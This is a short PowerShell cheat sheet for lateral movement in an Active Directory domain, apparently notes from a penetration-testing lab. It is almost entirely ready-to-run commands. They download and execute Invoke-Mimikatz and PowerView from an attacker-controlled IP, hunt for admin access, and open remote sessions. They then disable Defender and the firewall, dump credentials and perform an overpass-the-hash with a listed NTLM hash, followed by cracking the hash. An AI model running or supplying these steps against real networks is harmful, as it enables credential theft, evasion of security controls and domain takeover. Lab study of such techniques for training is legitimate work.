Move Lat-Invoke-Command
Get hashes and move laterally
Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1
#Find where you have local admin access
Find-LocalAdminAccess –Verbose
#Tools
Find-WMILocalAdminAccess.ps1
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where users are logged in:
Invoke-UserHunter
#Step Two: check if we have Admin access:
Invoke-UserHunter -CheckAccess
#Step Three: Check if we can execute commands:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}
#Step Four: Create a Session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess
#Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
or
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing)
#Step Six: Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#Step Eight: Invoke-Mimikatz from memory:
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess
Then exit the remote session -- IMPORTANT
#Step Nine: Overpass-the-Hash
#Open PowerShell Admin from Local Computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform the Overpass-the-Hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"
#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has a connection
whoami
Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -Computername
#Overpass-the-hash: generate tokens from hashes.
#Need to run powershell from local machine as admin
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"
#Crack Hash
john --format=nt hash
#Download for Windows
https://www.techspot.com/downloads/6970-john-the-ripper.html